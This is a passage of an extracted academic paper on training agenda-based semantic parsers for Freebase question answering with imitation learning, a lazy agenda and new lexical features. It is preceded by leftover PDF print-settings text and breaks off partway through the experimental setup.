<FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_kewvexetpzdd5axo24uef7rq64 ---- Imitation Learning of Agenda-based Semantic Parsers Jonathan Berant Stanford University yonatan@cs.stanford.edu Percy Liang Stanford University pliang@cs.stanford.edu Abstract Semantic parsers conventionally construct logical forms bottom-up in a fixed order, re- sulting in the generation of many extraneous partial logical forms. In this paper, we com- bine ideas from imitation learning and agenda- based parsing to train a semantic parser that searches partial logical forms in a more strate- gic order. Empirically, our parser reduces the number of constructed partial logical forms by an order of magnitude, and obtains a 6x-9x speedup over fixed-order parsing, while main- taining comparable accuracy. 1 Introduction Semantic parsing, the task of mapping natural language to semantic representations (e.g., log- ical forms), has emerged in recent years as a promising paradigm for developing question an- swering systems (Zelle and Mooney, 1996; Zettle- moyer and Collins, 2005; Wong and Mooney, 2007; Kwiatkowski et al., 2010; Liang et al., 2011) and other natural language interfaces (Zettlemoyer and Collins, 2007; Tellex et al., 2011; Matuszek et al., 2012). Recently, there have been two ma- jor trends: The first is to scale semantic parsing to large knowledge bases (KB) such as Freebase (Cai and Yates, 2013; Kwiatkowski et al., 2013; Berant and Liang, 2014). The second is to learn semantic parsers without relying on annotated logical forms, but instead on their denotations (answers) (Clarke et al., 2010; Liang et al., 2011); this lessens the anno- tation burden and has been instrumental in fueling the first trend (Berant et al., 2013). what city was abraham lincoln born in 391 508362 20 20 >1M Type.City u PlaceOfBirthOf.AbeLincoln Type.Loc u ContainedBy.LincolnTown . . . AbeLincoln LincolnTown USSLincoln . . . Type.City Type.Loc . . . PlaceOfBirthOf PlacesLived . . . Figure 1: A parsing chart for the utterance “what city was abraham lincoln born in”. Numbers in chart cells indicate the number of possible semantic parses constructed over that span, and arrows point to some of the logical forms that were con- structed. There are more than one million possible semantic parses for this utterance. In this paper, we are interested in training seman- tic parsers from denotations on large KBs. The chal- lenge in this setting is that the vocabulary of the target logical language often contains thousands of logical predicates, and there is a mismatch between the structure of the natural language and the logical language. As a result, the space of possible seman- tic parses for even a short utterance grows quickly. For example, consider the utterance “what city was abraham lincoln born in”. Figure 1 illustrates the number of possible semantic parses that can be con- structed over some of the utterance spans. Just by combining semantic parses over the spans “city”, “lincoln” and “born” we already obtain 362·391·20 possible parses; at the root, we get over a million parses.1 The ambiguity of language thus results in a 1 Even when type constraints are used to prune parses, we still produce more than a million possible parses at the root. Root:Type.City u PlaceOfBirthOf.AbeLincoln what Set:Type.City city was Set:PlaceOfBirthOf.AbeLincoln Entity:AbeLincoln abraham lincoln Binary:PlaceOfBirthOf born in Join Intersect Lex Lex Lex Figure 2: An example semantic parse, or derivation, for the utterance “what city was abraham lincoln born in”. Each node in the tree has a category (e.g., ENTITY) and a logical form (e.g., AbeLincoln). hard search problem. To manage this combinatorial explosion, past approaches (Krishnamurthy and Mitchell, 2012; Kwiatkowski et al., 2013; Berant et al., 2013) used beam search, where the number of parses (see Fig- ure 2) for each chart cell (e.g., (SET,3:5)) is capped at K. Typical bottom-up parsing is employed, where we build all parses for spans of length n before n + 1, etc. This fixed-order parsing strategy con- structs many unnecessary parses though. For ex- ample, it would create K parses for the category ENTITY and the span over “lincoln”, generating the logical form USSLincoln, although it is unlikely that this entity would be in the final logical form. To overcome the problems with fixed-order pars- ing, we turn to agenda-based parsing (Kay, 1986; Caraballo and Charniak, 1998; Klein and Manning, 2003; Pauls and Klein, 2009; Auli and Lopez, 2011). In agenda-based parsing, an agenda (priority queue) holds partial parses that can be constructed next. At each step, the parse with the highest priority is popped from the agenda and put into the chart. This gives the parser full control over the sequence of parses constructed. But importantly, agenda-based parsing requires a good scoring function that can rank not just full parses but also partial parses on the agenda. How do we obtain such a scoring function? To this end, we borrow ideas from imitation learn- ing for structured prediction (Daume et al., 2009; Ross et al., 2011; Goldberg and Nivre, 2013; Chang et al., 2015). Specifically, we cast agenda-based se- mantic parsing as a Markov decision process, where the goal is to learn a policy, that given a state (i.e., the current chart and agenda), chooses the best next action (i.e., the parse to pop from the agenda). The supervision signal is used to generate a sequence of oracle actions, from which the model is trained. Our work bears a strong resemblance to Jiang et al. (2012), who applied imitation learning to agenda- based parsing, but in the context of syntactic pars- ing. However, two new challenges arise in seman- tic parsing. First, syntactic parsing assumes gold parses, from which it is easy to derive an oracle ac- tion sequence. In contrast, we train from question- answer pairs only (rather than parse trees or even logical forms), so generating an oracle sequence is more challenging. Second, semantic parsers explore a much larger search space than syntactic parsers, due to the high level of uncertainty when translating to logical form. Thus, we hold a beam of parses for each chart cell, and modify learning for this setup. We gain further efficiency by introducing a lazy agenda, which reduces the number of parses that need to be scored. For example, the single action of processing “born”, requires placing 391 logical forms on the agenda, although only few of them will be used. Our lazy agenda holds derivation streams, which implicitly represent a (possibly in- finite!) group of related parses as a single agenda item, and lazily materialize parses as needed. Em- pirically, this reduces the number of parses that are scored at training time by 35%. Last, we make modeling contributions by aug- menting the feature set presented by Berant et al. (2013) with new features that improve the mapping of phrases to KB predicates. We evaluate our agenda-based parser on the WE- BQUESTIONS dataset (Berant et al., 2013) against a fixed-order parser, and observe that our parser re- duces the number of parsing actions by an order of magnitude, achieves a 6x-9x speedup, and obtains a comparable accuracy of 49.7%. To conclude, this paper describes three contribu- tions: First, a novel agenda-based semantic parser that learns to choose good parsing actions, train- ing from question-answer pairs only; Second, a lazy agenda that packs parses in streams and reduces the number of generated parses; Last, modeling changes that substantially improve accuracy. 2 Semantic Parsing Task While our agenda-based semantic parser applies more broadly, our exposition will be based on our primary motivation, question answering on a knowl- edge base. The semantic parsing task is defined as follows: Given (i) a knowledge base (KB) K, (ii) a grammar G (defined shortly), and (iii) a training set of question-answer pairs {(xi,yi)}ni=1, output a se- mantic parser that maps new questions x to answers y via latent logical forms z. We now briefly describe the KB and logical forms used in this paper. Let E denote a set of entities (e.g., AbeLincoln), and let P denote a set of properties (e.g., PlaceOfBirthOf). A knowledge base K is a set of assertions (e1,p,e2) ∈ E × P × E (e.g., (Hodgenville,PlaceOfBirthOf,AbeLincoln)). We use the Freebase KB (Google, 2013), which has 41M entities, 19K properties, and 596M assertions. To query the KB, we use the logical language simple λ-DCS. In simple λ-DCS, an entity (e.g., AbeLincoln) denotes the singleton set containing that entity; this is a special case of a unary pred- icate. A property (a special case of a binary predicate) can be joined with a unary predicate; e.g., PlaceOfBirthOf.AbeLincoln denotes all en- tities that are the place of birth of Abraham Lin- coln. We also have intersection: Type.City u PlaceOfBirthOf.AbeLincoln denotes the set of en- tities that are both cities and the place of birth of Abraham Lincoln. We write JzKK for the denotation of a logical form z with respect to a KB K. For a formal description of λ-DCS, see Liang (2013). 3 Grammars and Semantic Functions Since we are learning semantic parsers from deno- tations, we cannot induce a grammar from provided logical forms (Kwiatkowski et al., 2010). Instead, we assume a small and flexible grammar that spec- ifies the space of logical forms. The grammar con- sists of a backbone CFG, but is atypical in that each rule is augmented with a semantic (composition) function that produces a varying number of deriva- tions using arbitrary context. This flexibility pro- vides procedural control over the generation of logi- cal forms. Formally, a grammar is a tuple (V,N ,R), where V is a set of terminals (words), N is a set of cate- gories (such as BINARY, ENTITY, SET and ROOT in Figure 2, where ROOT is the root category), and R is a rule set of binary and unary rules, explained below. A binary rule r ∈ R has the form A → B C [f], where A ∈ N is the left-hand-side, B C ∈ N2 is the right-hand-side (RHS), and f is a semantic func- tion, explained below. Given an utterance x, the grammar defines a set of derivations (semantic parse trees) over every span xi:j = (wi,wi+1,. . . ,wj−1). Define D to be the set of all derivations, and let dAi:j be a derivation over the span xi:j of category A. Given the deriva- tions dBi:k and d C k:j and the rule r = A → B C [f], the semantic function f : D × D → 2D pro- duces a set of derivations f(dBi:k,d C k:j) over xi:j with category A. In words, the semantic func- tion takes two child derivations as input and pro- duces a set of candidate output derivations. For each output derivation d, let d.r be the rule used (SET → ENTITY BINARY[JOIN]) and d.z be the logical form constructed by f, usually created by combining the logical forms of the child deriva- tions (PlaceOfBirthOf.AbeLincoln). This com- pletes our description of binary rules; unary rules A → B [f] and lexical rules A → w [f] are handled similarly, where w ∈V+ is a sequence of terminals. Figure 3 demonstrates the flexibility of seman- tic functions. The JOIN semantic function takes a derivation whose logical form is a binary predicate, and a derivation whose logical form is a unary pred- icate, and performs a join operation. LEX takes a derivation representing a phrase and outputs many candidate derivations. INTERSECT takes two deriva- tions and attempts to intersect their logical forms (as defined in Section 2). In this specific case, no out- put derivations are produced because the KB types for Type.City and ReleaseDateOf.LincolnFilm do not match. In contrast with CFG rules for syntactic pars- ing, rules with semantic functions generate sets of derivations rather than a single derivation. We allow semantic functions to perform arbitrary operations on the child derivations, access external resources such as Freebase search API and the KB. In prac- tice, our grammar employs 11 semantic functions; in addition to JOIN, LEX, and INTERSECT, we use BRIDGE, which implements the bridging operation (see Section 8) from Berant et al. (2013), as well as ones that recognize dates and filter derivations based on part-of-speech tags, named entity tags, etc. Join ( Entity:AbeLincoln abraham lincoln , Binary:PlaceOfBirthOf born ) = { Set:PlaceOfBirthOf.AbeLincoln Entity:AbeLincoln abraham lincoln Binary:PlaceOfBirthOf born } Lex( lincoln ) = { Entity:AbeLincoln lincoln , Entity:LincolnFilm lincoln , ... } Intersect ( Set:Type.City city , Set:ReleaseDateOf.LincolnFilm abraham lincoln born ) = {} Figure 3: A semantic function (we show JOIN, LEX and INTERSECT) takes one or two child derivations and returns a set of possible derivations. 4 Fixed-order Parsing We now describe fixed-order parsing with beam search, which has been the common practice in past work (Krishnamurthy and Mitchell, 2012; Kwiatkowski et al., 2013; Berant et al., 2013). Let x be the input utterance. We call derivations dROOT 0:|x| , spanning the utterance x and with root cate- gory, root derivations, and all other derivations par- tial derivations. Given a scoring function s : D → R, a bottom-up fixed-order parser iterates over spans xi:j of increasing length n and categories A ∈ N , and uses the grammar to generate derivations based on derivations of subspans. We use beam search, in which for every span xi:j and every category A we keep a beam that stores up to K derivations in a chart cell HAi:j (where different derivations usually correspond to different logical forms). We denote by H the set of derivations in any chart cell. A fixed-order parser is guaranteed to compute the K highest-scoring derivations if the following two conditions hold: (i) all semantic functions return ex- actly one derivation, and (ii) the scoring function decomposes—that is, there is a function srule : R→ R such that for every rule r = A → B C [f], the score of a derivation produced by the rule is s(dAi:j) = s(d B i:k)+s(d C k:j)+srule(r). Unfortunately, the two conditions generally do not hold in seman- tic parsing. For example, the INTERSECT function returns an empty set when type-checking fails, vi- olating condition (i), and the scoring function s of- ten depends on the denotation size of the constructed logical form, violating condition (ii). In general, we want the flexibility of having the scoring function depend on the logical forms and sub-derivations, and therefore we will not be concerned with exactness in this paper. Note that we could augment the cat- egories N with the logical form, but this would in- crease the number of categories exponentially. Model. We focus on linear scoring functions: s(d) = φ(d)>θ, where φ(d) ∈ RF is the feature vector and θ ∈ RF is the parameter vector to be learned. Given any set of derivations D ⊆ D, we can define the corresponding log-linear distribution: pθ(d | D) = exp{φ(d)>θ}∑ d′∈D exp{φ(d′)>θ} . (1) Learning. The training data consists of a set of utterance-denotation (question-answer) pairs {(xi,yi)}ni=1. To learn θ, we use an online learn- ing algorithm, where on each (xi,yi), we use beam search based on the current parameters to construct a set of root derivations Di = HROOT0:|x| , and then take a gradient step on the following objective: Oi(θ) = log p(yi | xi) (2) = log ∑ d∈Di pθ(d | Di)R(d) + λ‖θ‖1, (3) where R(d) ∈ [0,1] is a reward function that mea- sures the compatibility of the predicted denotation Jd.zKK and the true denotation yi, 2. We marginalize over latent derivations, which are weighted by their compatibility with the observed denotation yi. The main drawback of fixed-order parsing is that to obtain the K root derivations Di, the parser must first construct K derivations for all spans and all cat- egories, many of which will not make it into any root derivation d ∈ Di. Next, we describe agenda-based parsing, whose goal is to give the parser better con- trol over the constructed derivations. 2Jd.zKK and yi are both sets of entities, so R is the F1 score. remove add Figure 4: A schematic illustration of a executing a parsing action, specified by a derivation on the agenda. First, we remove it from the agenda and put it in the chart. Then, combine it with other chart derivations to produce new derivations, which are added back to the agenda. Algorithm 1 Agenda-based parsing 1: procedure PARSE(x) 2: INITAGENDA() 3: while |Q| > 0∧|HROOT0:|x| | < K do 4: dAi:j ← choose derivation from Q 5: EXECUTEACTION(dAi:j) 6: choose and return derivation from HROOT0:|x| 7: function EXECUTEACTION(dAi:j) 8: remove dAi:j from Q 9: if |HAi:j| < K then 10: HAi:j.add(d A i:j) 11: COMBINE(dAi:j) 12: function COMBINE(dAi:j) 13: for k > j and r = B → AC [f] ∈R do 14: for dCj,k ∈ H C j:k do 15: Q.addAll(f(dAi:j,d C j:k)) 16: for k < i and r = B → C A [f] ∈R do 17: for dCk,i ∈ H C k:i do 18: Q.addAll(f(dCk:i,d A i:j)) 19: function INITAGENDA() 20: for A → xi:j [f] ∈R do 21: Q.addAll(f(xi:j)) 5 Agenda-based Parsing The idea of using an agenda for parsing has a long history (Kay, 1986; Caraballo and Charniak, 1998; Pauls and Klein, 2009). An agenda-based parser controls the order in which derivations are con- structed using an agenda Q, which contains a set of derivations to be processed. At each point in time the state of the parser consists of two sets of derivations, the chart H and the agenda Q. Each parsing action chooses a derivation from the agenda, moves it to the chart, combines it with other chart derivations, and adds new derivations to the agenda (Figure 4). Algorithm 1 describes agenda-based parsing. The algorithm shows binary rules; unary rules are treated similarly. First, we initialize the agenda by applying all rules whose RHS has only terminals, adding the resulting derivations to the agenda. Then, we per- form parsing actions until either the agenda is empty or we obtain K root derivations. On each action, we first choose a derivation dAi:j to remove from Q and add it to HAi:j, unless H A i:j already has K derivations. Then, we combine dAi:j with all derivations dj:k to the right and dk:i to the left. Upon termination, we perform a final action, in which we return a single derivation from all constructed root derivations. The most natural way to choose an agenda deriva- tion (and the root derivation in the final action) is by taking the highest scoring derivation d = arg maxd∈Q s(d). Most work on agenda-based pars- ing generally assumed that the scoring function s is learned separately (e.g., from maximum likelihood estimation of a generative PCFG). Furthermore, they assumed that s satisfies the decomposition property (Section 4), which guarantees obtaining the high- est scoring root derivation in the end. We, on the other hand, make no assumptions on s, and follow- ing Jiang et al. (2012), we learn a scoring function that is tightly coupled with agenda-based parsing. This is the topic of the next section. 6 Learning a Scoring Function The objective in (2) is based on only a distribution over root derivations. Thus, by optimizing it, we do not explicitly learn anything about partial deriva- tions that never make it to the root. Consider the derivation in Figure 1 over the phrase “lincoln” with the logical form USSLincoln. If none of the K root derivations contains this partial derivation, (2) will not penalize it, and we might repeatedly construct it even though it is useless. To discourage this, we need to be sensitive to intermediate parsing stages. 6.1 Imitation learning We adapt the approach of Jiang et al. (2012) for agenda-based syntactic parsing to semantic parsing. Recall that a parsing state is s = (H,Q), where H ⊆D is the chart and Q ⊆D is the agenda.3 The available actions are exactly the derivations 3To keep the state space discrete, states do not include derivation scores. This is why in Algorithm 1 we keep a list of up to K derivations in every chart cell rather than a beam, which would require actions to depend on derivation scores. on the agenda Q, and the successor state s′ is com- puted via EXECUTEACTION() from Algorithm 1. We model the policy as a log-linear distribution over (partial) agenda derivations Q: pθ(a | s) = pθ(d = a | Q), according to (1). Note that the state s only provides the support of the distribution; the shape depends on only features φ(a) of the chosen action a, not on other aspects of s. This simple param- eterization allows us to follow a policy efficiently: when we add a derivation a to the agenda, we insert it with priority equal to its score s(a) = φ(a)>θ. Computing the best action arg maxa pθ(a | s) sim- ply involves popping from the priority queue. A history h = (s1,a1, . . . ,aT ,sT+1) (see Fig- ure 5) is a sequence of states and actions, such that s1 has an empty chart and an initial agenda, and sT+1 is a terminal state reached after performing the chart action in which we choose a root derivation aT from HROOT 0:|x| (Algorithm 1). The policy for choosing parsing actions induces a distribution over histories pθ(h) = ∏T t=1 pθ(at | st). At a high level, our policy is trained using imi- tation learning to mimic an oracle that takes a opti- mal action at every step (Daume et al., 2009; Ross et al., 2011). Because in semantic parsing we train from questions and answers, we do not have access to an oracle. Instead, we first parse x by sampling a history from the current policy pθ; let d∗ be the root derivation with highest reward out of the K root derivations constructed (see (2)). We then generate a target history htarget from d∗ using two ideas—local reweighting and history compression, which we ex- plain shortly. The policy parameters θ are then up- dated as follows: θ ← θ + η R(htarget) T∑ t=1 δt(htarget), (4) δt(h) = ∇θ log pθ(at | st) (5) = φ(at)−Epθ(a′t|st)[φ(a ′ t)]. The reward R(h) = R(aT ) ∈ [0,1] measures the compatibility of the returned derivation (see (2)), and η is the learning rate.4 Note that while our fea- 4 Note that unlike standard policy gradient, our updates are not invariant (even in expectation) to shifting the reward by a constant. Our updates do not maximize reward, but the reward merely provides a way to modulate the magnitude of the up- dates. st−1 st st+1 at−1 at Figure 5: A schematic illustration of a (partial) history of states and actions. Each ellipse represents a state (chart and agenda), and the red path marks the actions chosen. tures φ(a) depend on the action only, the update rule takes into account all actions that are on the agenda. Local reweighting. Given the reference d∗, let I[a in d∗] indicate whether an action a is a sub- derivation of d∗. We sample htarget from the lo- cally reweighted distribution p+wθ (a | s) ∝ pθ(a | s)·exp{β I[a in d∗]} for some β > 0. This is a mul- tiplicative interpolation of the model distribution pθ and the oracle. When β is high, this reduces to sam- pling from the available actions in d∗. When no or- acle actions are available, this reduces to sampling from pθ. The probability of a history is defined as p+wθ (h) = ∏T t=1 p +w θ (at | st). Recall we construct K root derivations. A prob- lem with local reweighting is that after adding d∗ to the chart, there are no more oracle actions on the agenda and all subsequent actions are simply sam- pled from the model. We found that updating to- wards these actions hurts accuracy. To avoid this problem, we propose performing history compres- sion, described next. History compression. Given d∗, we can define for every history h a sequence of indices (t1, t2, . . .) such that I[ati in d ∗] = 1 for every i. Then, the compressed history c(h) = (st1,at1,st2,at2, . . .) is a sequence of states and actions such that all actions choose sub-derivations of d∗. Note that c(h) is not a “real history” in the sense that tak- ing action ati does not necessarily result in state sti+1 . In Figure 6, the compressed history c(h) = (s1,a1,s3,a3,s4,a4,s5). We can now sample a target history htarget for (4) from a distribution over compressed histories, a4 = d ∗ h : a1 a3 s1 s2 s3 s4 s5 a1 a2 a3 a4 Figure 6: An example history of states and actions, where ac- tions that are part of the reference derivation d∗ = a4 are in red. The compressed history is c(h) = (s1,a1,s3,a3,s4,a4,s5). Algorithm 2 Learning algorithm procedure LEARN({xi,yi}ni=1) θ ← 0 for each iteration τ and example i do h0 ← PARSE(pθ,xi) d∗ ← CHOOSEORACLE(h0) htarget ← PARSE(p+cwθ ,xi) θ ← θ + ητ,i ·R(htarget) ∑T t=1 δt(htarget) p+cθ (h) = ∑ h′:c(h′)=h pθ(h), where we marginal- ize over all histories that have the same compressed history. To sample from p+cθ , we sample h ′ ∼ pθ and return htarget = c(h′). This will provide a his- tory containing only actions leading to the oracle d∗. In our full model, we sample a history from p+cwθ , which combines local reweighting and his- tory compression: we sample h′ ∼ p+wθ and re- turn htarget = c(h′). We empirically analyze local reweighting and history compression in Section 9. In practice, we set β large enough so that the be- havior of p+cwθ is as follows: we first construct the reference d∗ by sampling oracle actions. After con- structing d∗, no oracle actions are on the agenda, so we construct K −1 more root derivations, sampling from pθ (but note these actions are not part of the re- turned compressed history). Finally, the last action chooses d∗ from the K derivations. Algorithm 2 summarizes learning. We initialize our parameters to zero, and then parse each exam- ple by sampling a history from pθ. We choose the derivation with highest reward in HROOT 0:|x| as the ref- erence derivation d∗. This defines p+cwθ , which we sample from to update parameters. The learning rate ητ,i is set using AdaGrad (Duchi et al., 2010). 6.2 Related approaches Our method is related to policy gradient in reinforce- ment learning (Sutton et al., 1999): if in (4), we sample from the model distribution pθ without an oracle, then our update is exactly the policy gradi- ent update, which maximizes the expected reward Epθ(h) [R(h)]. We do not use policy gradient since the gradient is almost zero during the beginning of training, leading to slow convergence. This corrob- orates Jiang et al. (2012). Our method extends Jiang et al. (2012) to seman- tic parsing, which poses the following challenges: (a) We train from denotations, and must obtain a ref- erence to guide learning. (b) To combat lexical un- certainty we maintain a beam of size K in each pars- ing state (we show this is important in Section 9). (c) We introduce history compression, which focuses the learner on the actions that produce the correct derivation rather than incorrect ones on the beam. Interestingly, Jiang et al. (2012) found that imitation learning did not work well, and obtained improve- ments from interpolating with policy gradient. We found that imitation learning worked well, and in- terpolating with policy gradient did not offer further improvements. A possible explanation is that the uncertainty preserved in the K derivations in each chart cell allowed imitation learning to generalize properly, compared to Jiang et al. (2012), who had just a single item in each chart cell. 7 Lazy Agenda As we saw in Section 3, a single semantic function (e.g., LEX, BRIDGE) can create hundreds of deriva- tions. Scoring all these derivations when adding them to the agenda is wasteful, because most have low probability. In this section, we assume semantic functions return a derivation stream, i.e., an itera- tor that lazily computes derivations on demand. Our lazy agenda G will hold derivation streams rather than derivations, and the actual agenda Q will be defined only implicitly. The intuition is similar to lazy K-best parsing (Huang and Chiang, 2005), but is applied to agenda-based semantic parsing. Our main assumption is that every derivation stream g = [d1,d2, . . . ], is sorted by decreasing score: s(d1) ≥ s(d2) ≥ ··· (in practice, this is only approximated as we explain at the end of this sec- tion). We define the score of a derivation stream as s(g) = s(d1). At test time the only change to Al- gorithm 1 is in line 4, where instead of popping the G s(g[1]) |g| U [d1] 7 1 0.88 [d2, d3, d4, . . . ] 5 100 11.92 G s(g[1]) |g| U [d1] 7 1 0.88 [d2] 5 1 0.12 [d3] 1 1 0.006 [d4, . . . ] −2 98 0.004 Figure 7: Unrolling a derivation where � = 0.01 and |G+| = 1. The stream in red on the left violates the stopping condition, and so we unroll two derivations until all streams satisfy the condition. highest scoring derivation, we pop the highest scor- ing derivation stream and process the first derivation on the stream. Then, we featurize and score the next derivation on the stream if the stream is not empty, and push the stream back to the agenda. This guar- antees we will obtain the highest scoring derivation in every parsing action. However, during training we sample from a distri- bution over derivations, not just return the argmax. Sampling from the distribution over streams can be quite inaccurate. Suppose the agenda contains two derivation streams: g1 contains one derivation with score 1 and g2 contains 50 derivations with score 0. Then we would assign g1 probability e1 e1+e0 = 0.73 instead of the true model probability e 1 e1+50e0 = 0.05. The issue is that the first derivation of g is not indicative of the actual probability mass in g. Our solution is simple: before sampling (line 4 in Algorithm 1), we process the agenda to guarantee that the sum of probabilities of all unscored deriva- tions is smaller than �. Let G be the lazy agenda and G+ ⊆ G be the subset of derivation streams that contain more than one derivation (where unscored derivations exist). If for every g ∈ G+, pθ(g) =∑ d∈g pθ(d) ≤ � |G+|, then the probability sum of all unscored derivation is small: ∑ g∈G+ p(g) ≤ �. To guarantee that pθ(g) ≤ �|G+|, we unroll g un- til this stopping condition is satisfied. Unrolling a stream from g = [d1,d2, . . . ] means popping d1 from g, constructing a singleton derivation stream gnew = [d1], pushing gnew to the agenda and scoring the remaining stream based on the next derivation s(g) = s(d2) (Figure 7). To check if p(g) ≤ �|G+|, we define the follow- ing upper bound U on p(g), which is based on the number of derivations in the stream |g|: pθ(g) = ∑ d∈g e s(d)∑ g′∈G ∑ d′∈g′ e s(d′) ≤ |g|es(g[1])∑ g′∈G e s(g′[1]) = U where g[1] is the first derivation in g. Checking that U ≤ �|G+| is easy, since it is based only on the first derivation of every stream. Once all streams meet this criterion, we know that the total unscored prob- ability is less than �. As learning progresses, there are be many low probability derivations which we can skip entirely. The last missing piece is ensuring that streams are sorted without explicitly scoring all derivations. We make a best effort to preserve this property. Sorting derivation streams. All derivations in a stream g have the same child derivations, as they were constructed by one application of a seman- tic function f. Thus, the difference in their scores is only due to new features created when applying f. We can decompose these new features into two disjoint feature sets. One set includes features that depend on the grammar rule only and are indepen- dent of the input utterance x, and another also de- pends on x. For example, the semantic function f = LEX maps phrases, such as “born in”, to log- ical forms, such as PlaceOfBirthOf. Most features extracted by LEX do not depend on x: the con- junction of “born in” and PlaceOfBirthOf, the fre- quency of the phrase “born in” in a corpus, etc. However, some features may depend on x as well. For example, if x is “what city was abraham lin- coln born in”, we can conjoin PlaceOfBirthOf with the first two words “what city”. As another ex- ample, the semantic function BRIDGE takes unary predicates, such as AbeLincoln, and joins them with any type-compatible binary to produce logi- cal forms, such as PlaceOfBirthOf.AbeLincoln. Again, a feature such as the number of assertions in K that contain PlaceOfBirthOf does not de- pend on x, while a feature that conjoins the intro- duced binary (PlaceOfBirthOf) with the main verb (“born”), does depend on x (see Section 8). Our strategy is to pre-compute all features that are independent of x before training,5 and sort streams 5For LEX, this requires going over all lexicon entries once. For BRIDGE, this requires going once over the KB. based on these features only, as an approximation for the true order. Let’s assume that derivations re- turned by an application of a semantic function f are parameterized by an auxiliary set B. For example, when applying LEX on “born in”, B will include all lexical entries that map “born in” to a binary predicate. When applying BRIDGE on AbeLincoln, B will include all binary predicates that are type- compatible with AbeLincoln. We equip each b ∈B with a feature vector φB(b) (computed before train- ing) of all features that are independent of x. This gives rise to a score sB(b) = φB(b)>θ that depends on the semantic function only. Thus, we can sort B before parsing, so that when the function f is called, we do not need to instantiate the derivations. Note that the parameters θ and thus sB change during learning, so we re-sort B after every iteration (of going through all training examples), yielding an approximation to the true ordering of B. In practice, features extracted by LEX depend mostly on the lex- ical entry itself and our approximation is accurate, while for BRIDGE some features depend on x, as we explain next. 8 Features The feature set in our model includes all features de- scribed in Berant et al. (2013).6 In addition, we add new lexicalized features that connect natural lan- guage phrases to binary predicates. In Berant et al. (2013), a binary predicate is generated using a lexicon constructed offline via alignment, or through the bridging operation. As mentioned above, bridging allows us to join unary predicates with binary predicates that are type- compatible, even when no word in the utterance trig- gers the binary predicate. For example, given the ut- terance “what money to take to sri lanka”, the parser will identify the entity SriLanka, and bridging will propose all possible binaries, including Currency. We add a feature template that conjoins binaries suggested by bridging (Currency) with all content word lemmas (“what”, “money”, “take”). After observing enough examples, we expect the feature corresponding to “money” and Currency to be up- weighted. Generating freely and reweighting using 6 As in previous work, some features use the fact that the spelling of KB predicates is often similar to English words. features can be viewed as a soft way to expand the lexicon during training, similar to lexicon generation (Zettlemoyer and Collins, 2005). Note that this fea- ture depends on the utterance x, and is not used for sorting streams (Section 7). Finally, each feature is actually duplicated: one copy fires when choosing derivations on the agenda (Algorithm 1, line 4), and the other copy fires when choosing the final root derivation (line 6). We found that the increased expressivity from separating fea- tures improves accuracy. 9 Experiments We evaluate our semantic parser on the WEBQUES- TIONS dataset (Berant et al., 2013), which con- tains 5,810 question-answer pairs. The questions are about popular topics (e.g., “what movies does taylor lautner play in?”) and answers are sets of entities obtained through crowdsourcing (all questions are answerable by Freebase). We use the provided train- test split and perform three random 80%-20% splits of the training data for development. We perform lexical lookup for Freebase entities using the Freebase Search API and obtain 20 can- didate entities for every named entity identified by Stanford CoreNLP (Manning et al., 2014). We use the lexicon released by Berant et al. (2013) to re- trieve unary and binary predicates. We execute λ- DCS logical forms by converting them to SPARQL and querying our local Virtuoso-backed copy of Freebase. During training, we use L1 regularization, and crudely tune hyperparameters on the develop- ment set (beam size K = 200, tolerance for the lazy agenda � = 0.01, local reweighting β = 